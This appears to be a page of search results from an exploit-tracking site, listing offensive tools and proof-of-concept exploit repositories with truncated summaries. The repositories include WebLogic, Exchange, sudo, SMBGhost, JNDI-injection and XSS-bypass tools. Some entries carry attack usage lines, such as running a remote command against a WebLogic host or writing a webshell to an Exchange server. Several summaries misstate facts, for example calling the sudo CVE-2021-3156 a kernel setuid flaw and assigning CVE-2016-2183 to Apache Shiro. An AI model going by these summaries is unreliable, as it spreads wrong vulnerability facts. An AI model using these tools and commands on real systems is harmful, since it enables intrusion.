1899 matches found
CMSmap
It is an offensive tool for web application security testing. The primary CVE ID is not present in the provided context. The target product/service or framework is not explicitly stated, but the tool appears to be designed for testing popular Content Management Systems CMSs such as WordPress,...
Findsploit
It is an offensive tool for searching and exploiting. The primary CVE ID is not explicitly mentioned in the provided context. The tool, Findsploit, is a bash script that searches both local and online exploit databases. It includes three sub-scripts: "compilesploit" to automatically compile and r...
Exploit for CVE-2019-1322
Erebus CobaltStrike后渗透测试插件 部分功能只适用于cobalt strike 4.x 由于异步处理问题,某些功能可能会存在BUG 暂时未找到解决方法,如果大佬们有解决方案,欢迎联系我 更新日志 2020-10-19V1.3.5 - 添加badcmd命令基于badpotato - potatos提权添加badpotato - post模块添加socks功能基于ew 详见post----Socks tunnel - 删除信息收集模块审计功能 更新日志 2020-07-31V1.3.4 - 添加fakelogonscreen命令 - 添加SpaceRunner...
Exploit for Use After Free in Microsoft
微软3389远程漏洞CVE-2019-0708批量检测工具 0x001 Win下检测 https://github.com/robertdavidgraham/rdpscan C:\Users\K8team\Desktop\rdpscan-master\vs10\Release 的目录 2019/06/02 02:11 DIR . 2019/06/02 02:11 DIR .. 2019/06/02 01:55 2,582,016 libcrypto-11.dll 2019/06/02 01:57 619,520 libssl-11.dll 2019/06/02 02:04 172,03...
Exploit for Missing Authorization in Linuxfoundation Harbor
Ary Ary 是一个集成类工具,主要用于调用各种安全工具,从而形成便捷的一键式渗透。 版本:2.1.1 公开版 作者: Ali0th 联系: [email protected] 主页: github.com/Martin2877 声明:本工具仅供学习、测试使用,严禁用于非法用途,开发者对使用者的违法行为不负责任。 交流:欢迎提issue,或私信我加入工具使用交流群。 下载 前往releases下载 相关文档 我的一键 getshell 代码开发之路v1.8.pdf 功能 注意,部分功能还在开发中 0. 信息收集工具开发中 1. 通过多个网络空间的搜索引擎批量爬取相应网站, 如...
Exploit for CVE-2020-14882
CVE-2020-14882ALL CVE-2020-14882ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。 需要模块:requests、http.client (工具仅用于授权的安全测试,请勿用于非法使用,违规行为与作者无关。) 命令回显模块已知成功版本:12.2.1.3.0、12.2.1.4.0、14.1.1.0.0 选项 功能一:命令回显 python3 CVE-2020-14882ALL.py -u http://1.1.1.1:7001 -c "net user" python3 CVE-2020-14882ALL.py -u...
pwntools
This repository is an open-source project for a Python library called pwntools, which is used for reverse engineering and exploitation of binaries. The library is designed to be a comprehensive tool for security researchers and developers. The repository contains a variety of files, including:...
Exploit for CVE-2019-1003000
PoC exploit for CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002: Script Security, Pipeline: Groovy, Pipeline: Declarative. This PoC allows users with Overall/Read permission and Job/Configure and optional Job/Build to bypass the sandbox protection and execute arbitrary code on the Jenkins...
Pwnable.kr-CTF-Writeups
This repository contains writeups for a CTF Capture The Flag challenge called Pwnable.kr. The challenge involves exploiting vulnerabilities in various programs to obtain flags. The repository includes four writeups: 1. FD: This writeup involves exploiting a file descriptor vulnerability in a...
pocsuite_poc_collect
It is an offensive tool for vulnerability exploitation...
Exploit for Improper Authentication in Apache Shiro
Apache Shiro 认证绕过分析(CVE-2020-17523) https://www.anquanke.com/post/id/230935 0x01 漏洞描述 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 当它和 Spring 结合使用时,在一定权限匹配规则下,攻击者可通过构造特殊的 HTTP 请求包完成身份认证绕过。 影响范围:Apache Shiro 1.7.1 0x02 漏洞环境搭建 shiro 1.7...
vulscan
This is a Python-based web application for vulnerability scanning and management. The application is built using Django and has several features, including: 1. Vulnerability Scanning: The application can scan for vulnerabilities in web applications using a variety of plugins POCs. 2. Plugin...
Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Redhat Jboss_Enterprise_Application_Platform
PoC exploit for CVE-2016-2183, a Padding Oracle vulnerability in Apache Shiro. The exploit targets the RCE Remote Code Execution vector, leveraging the Padding Oracle attack to bypass encryption and inject arbitrary data. The probable entry point is the shirooraclepadding.py script, which is...
ysoserial
This is a Java-based tool called ysoserial, which generates payloads that exploit unsafe Java object deserialization. The tool is designed to create payloads that can be used to attack vulnerable Java applications. The tool uses a variety of payloads, including CommonsCollectionsK1,...
Exploit for Deserialization of Untrusted Data in Fasterxml Jackson-Databind
CVE-2020-8840:FasterXML/jackson-databind 远程代码执行漏洞 0x00 简介 jackson-databind 是隶属 FasterXML 项目组下的JSON处理库。 0x01 漏洞概述 2月19日,NVD发布安全通告披露了jackson-databind由JNDI注入导致的远程代码执行漏洞(CVE-2020-8840),CVSS评分为9.8...
vulhub1
This repository is an open-source collection of pre-built vulnerable docker environments, known as Vulhub. It is a collection of vulnerable environments for testing and learning purposes, with no pre-existing knowledge of docker required. The repository contains a variety of vulnerable...
Exploit for Off-by-one Error in Sudo_Project Sudo
This repository contains exploits for the CVE-2021-3156 vulnerability, which affects the Linux kernel. The vulnerability allows an attacker to gain root privileges by exploiting a flaw in the way the kernel handles the "setuid" system call. The repository contains two exploit files: "exploit.c" a...
Exploit for Improper Handling of Exceptional Conditions in Sudo_Project Sudo
PoC exploit for CVE-2019-14287, a vulnerability in Sudo before 1.8.28. The exploit targets the ability of an attacker with access to a Runas ALL sudoer account to bypass certain policy blacklists and session PAM modules, and cause incorrect logging, by invoking sudo with a crafted user ID. The...
Exploit for Off-by-one Error in Sudo_Project Sudo
This is a PoC exploit for CVE-2021-3156, a heap-based overflow vulnerability in sudo. The exploit is a C program that creates a shared library libnssX/P0PSH3LLZ.so.2 that overflows the heap when sudoedit is called. The exploit can be built using the provided Makefile and run using the...
shadowbroker
This repository, lvxiao54/shadowbroker, contains a collection of exploits and tools, including the infamous Shadow Brokers dump. The primary focus of this repository is on exploiting vulnerabilities in various software and systems, particularly in the context of Windows and Linux. The repository...
dedecmscan
This is a Python-based vulnerability scanner for the DedeCMS platform. The scanner is designed to identify potential vulnerabilities in the platform, including SQL injection, cross-site scripting XSS, and other types of attacks. The scanner consists of several modules, each responsible for...
vulhub
This repository is an open-source collection of pre-built vulnerable docker environments, referred to as 'Vulhub'. It is an offensive tool for web application security testing and vulnerability research. The primary vulnerability targeted by this repository is not explicitly stated, but it contai...
Exploit for CVE-2020-14756
This is an exploit module for the CVE-2020-14756 vulnerability in Oracle WebLogic. The vulnerability allows for remote code execution RCE due to a deserialization issue in the coherence.jar library. The exploit is written in Python and uses the socket library to establish a connection to the...
CDK
This is an offensive tool for container penetration. It is called CDK Container Penetration Toolkit and is designed for offering stable exploitation in different slimmed containers without any OS dependency. The tool comes with useful net-tools and many powerful PoCs/EXPs that help users to escap...
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft
This is a proof-of-concept PoC exploit for CVE-2020-0796, also known as SMBGhost, a pre-authentication remote code execution vulnerability in Windows SMBv3. The exploit is written in Python and uses the SMB protocol to inject shellcode into the Windows kernel. The shellcode is generated from a...
Exploit for Improper Access Control in Elasticsearch
欢迎各位大佬提BUG,当前版本 AssetScanV1.3 周期 初版:2019年11月28日 V1.0初版编写完成 修改1:2019年12月02日 感谢Shadow·J反馈kali下文件导入异常 修改2:2019年12月03日 V1.1发布,新增ARP存活检测(回滚,测bug) 修改3:2019年12月04日 V1.2发布,修复漏洞脚本异常,修复weblogic脚本 修改4:2019年12月05日 V1.2修改,感谢sevck提供设计思路以及代码不规范问题 修改5:2019年12月05日 V1.2修改,修复IP数据处理异常 修改6:2019年12月19日...
Exploit for Improper Initialization in Apple Ipados
This is a PoC exploit for CVE-2020-27950, a vulnerability in the macOS kernel that allows for a port pointer leak. The exploit targets the macOS kernel and leverages a vulnerability in the kalloc.1024 buffer to allocate a controlled buffer with a magic value. The exploit then creates an ipckmsg...
JNDIExploit
JNDIExploit 一款用于 JNDI注入 利用的工具,大量参考/引用了 Rogue JNDI 项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用 java -jar JNDIExploit.jar -h 查看参数说明,其中 --ip 参数为必选参数 Usage: java -jar JNDIExploit.jar options Options: -i, --ip Local ip address -l, --ldapPort Ldap bind port default: 1389 -p,...
Exploit for Improper Input Validation in Apache Unomi
PoC exploit for CVE-2020-13942, an unauthenticated RCE vulnerability through MVEL and OGNL injection in Apache Unomi. The exploit targets the context.js/json endpoint exposed by the Unomi server, allowing an attacker to execute arbitrary OS commands. Two RCE vectors are available: MVEL injection...
Exploit for CVE-2020-14644
It is an offensive tool for WebLogic. The repository contains a basic proof-of-concept PoC and exploit script for WebLogic, with the goal of creating a unified detection and exploitation tool. The script, named weblogicpoc.py, uses the T3 protocol to connect to a WebLogic server and exploit...
PrivescCheck
This is a PoC exploit for Windows privilege escalation enumeration. The script, PrivescCheck, is designed to identify common Windows security misconfigurations that can be leveraged for privilege escalation. It gathers various information that might be useful for exploitation and/or...
XSS_Bypass_Payload
It is an offensive tool for XSS. The repository contains a collection of XSS bypass payloads, which are used to exploit vulnerabilities in web applications to inject malicious code. The payloads are designed to bypass various security measures, such as Content Security Policy CSP and XSS filters...
Exploit for CVE-2020-16898
CVE-2020-16898 CVE-2020-16898 Windows TCP/IP远程代码执行漏洞 EXP&POC 复现 forforever:https://www.cnblogs.com/forforever/p/13846077.html poc CVE-2020-16898Checker-poc 命令: 管理员启动powershell/CMD Powershell.exe -ExecutionPolicy UnRestricted -File .\CVE-2020-16898-poc.ps1 exp cve-2020-16898-exp2...
Exploit for CVE-2020-14882
CVE-2020–14882 Weblogic Unauthorized bypass RCE bypass patch with CVE-2020–14882 private static final String IllegalUrl = new String";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", ""; list %252E%252E %2E%2E .. %3E %3C ; lower "%252E%252E%252F".lower '%252e%252e%252f' %252E%252E%252F to...
Exploit for Path Traversal in Intelbras Tip200_Firmware
PoC exploit for CVE-2020-13886, a Local File Include LFI vulnerability in Intelbras TIP 200/200 LITE/TIP 300 devices. The exploit targets the /cgi-bin/cgiServer.exx?page= parameter, allowing an attacker to read sensitive files on the device. The poc.py script takes two user inputs: the URL...
Exploit for Improper Privilege Management in Microsoft
内网渗透学习笔记 作者:chriskali Github:chriskaliX 近期,拜读了腾讯蓝军-红蓝对抗之Windows内网渗透,学到了不少知识点。打算拆分章节进行整理以及复现,主要记录自己缺失的知识点。这是一个大杂烩文章,主线是跟着jumbo师傅的思路,碰到感兴趣的,我会继续扩展。可能有点凌乱,希望大家见谅。 0x01 环境搭建 这一步略过,简单介绍一下测试的环境 |主机名|IP地址|角色|系统| |:-:|:-:|:-:|:-:| |DC|10.10.10.10|DC|DNS|Winserver 2012| |John|10.10.10.11|normal|win7|...
blogpost_qiling_dlink_1
It is an offensive tool for exploiting vulnerabilities in software. The repository contains a Python script that exploits a vulnerability in a software product. The script is designed to be used by a penetration tester or a security researcher to test the security of the software. The script uses...
Exploit for CVE-2020-1034
This is a PoC Proof of Concept exploit for CVE-2020-1034, a vulnerability discovered by Microsoft and fixed on August 9, 2020. The exploit targets an unpatched Windows 10 2004, build 19041.488. The exploit code is written in C++ and uses the Windows API to manipulate the system's Event Tracing fo...
shellcode-x86_x64
This repository contains a collection of assembly code examples for a 64-bit Linux system, primarily focusing on basic instructions and operations. The code is written in NASM Netwide Assembler and covers various topics such as arithmetic, logical operations, string manipulation, and stack...
CDK
It is an offensive tool for container exploitation. The primary CVE ID is not explicitly stated in the provided context, but the tool is designed for container exploitation, which may involve various vulnerabilities. The tool, CDK, is a zero-dependency container penetration toolkit that offers...
Exploit for Improper Input Validation in Cisco Adaptive_Security_Appliance_Software
PoC exploit for CVE-2020-3452, an unauthorized remote file reading vulnerability in Cisco Adaptive Security Appliance and FTD Software. The exploit uses Shodan to scan for vulnerable targets, then attempts to exploit the vulnerability by sending crafted HTTP requests to the identified targets. Th...
Exploit for CVE-2020-17008
CVE-2020-17008 splWOW64 Elevation of Privilege C:\Windows\splwow64.exe Poc From: https://bugs.chromium.org/p/project-zero/issues/detail?id=2096 0x01 set splwow64poc.exe Low cd splwow64poc\x64\Release icacls splwow64poc.exe /setintegritylevel L /setintegritylevel CIOI级别将完整性 ACE 显式...
Exploit for CVE-2020-17057
cve-2020-17057 cve-2020-17057 poc 微软于2020-11-10日发布补丁修补...
Exploit for OS Command Injection in Sonatype Nexus_Repository_Manager
CVE-2019-5475 CVE-2019-5475 与 CVE-2019-15588 靶场: RCE 命令注入漏洞 ------ 0x00 背景 CVE-2019-5475 是 Nexus 关于内置插件 Yum Repository 的 RCE 命令注入漏洞,其最早被披露于 hackerone,但因官方第一次修复不完整,故又衍生出了 CVE-2019-15588 漏洞。 这两个漏洞都需要以 admin 身份登录后才可以利用,但是 nexus 默认管理员密码 admin123 经常被忽略修改,很容易就被利用了。 0x10 靶场环境 0x20 目录结构 CVE-2019-5475 ├──...
Exploit for CVE-2020-27949
This is a PoC exploit for CVE-2020-27949, a vulnerability in macOS's DTrace system that allows an attacker to read memory of other processes without elevated permissions. The exploit creates probes in the victim process using the /dev/fasttrap device, which lacks permission checks, allowing any...
Exploit for Improper Access Control in Xen
kernelexploitfactory Keep updating...... Linux kernel CVE exploit analysis report and relative debug environment. You don't need to compile Linux kernel and configure your environment anymore. This repository is to extract all Linux kernel exploit and relative debug environment. The test is on...
Exploit for OS Command Injection in Apache Struts
CVE-2020-26259 CVE-2020-26259: XStream1.4.14 is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights. https://x-stream.github.io/CVE-2020-26259.html XStream 1.4.14 pom.xml com.thoughtworks.xstream xstream 1.4.14 poc...
Exploit for Deserialization of Untrusted Data in Microsoft
This is a weaponized tool for exploiting the Microsoft Exchange 2010 MRM.AutoTag.Model unsafe deserialize vulnerability, identified as CVE-2020-17144. The tool is written in C and uses the .NET framework 3.5. The tool consists of two files: e.cs and cve-2020-17144.cs. The e.cs file is a simple C...
Exploit for Deserialization of Untrusted Data in Microsoft
CVE-2020-17144-EXP 条件: Exchange2010; 普通用户 默认用法写webshell: CVE-2020-17144-EXP.exe mail.example.com user pass 执行命令 & 端口复用: 修改ExploitClass.cs 参考 @zcgonvh...
Exploit for Expression Language Injection in Apache Struts
PoC exploit for CVE-2020-17530, a deserialization vulnerability in Apache Struts 2.0.0 to 2.5.25. The target product/service is Apache Struts, specifically the struts2showcasewar application. The vulnerability class/vector is deserialization, allowing for remote code execution. The probable entry...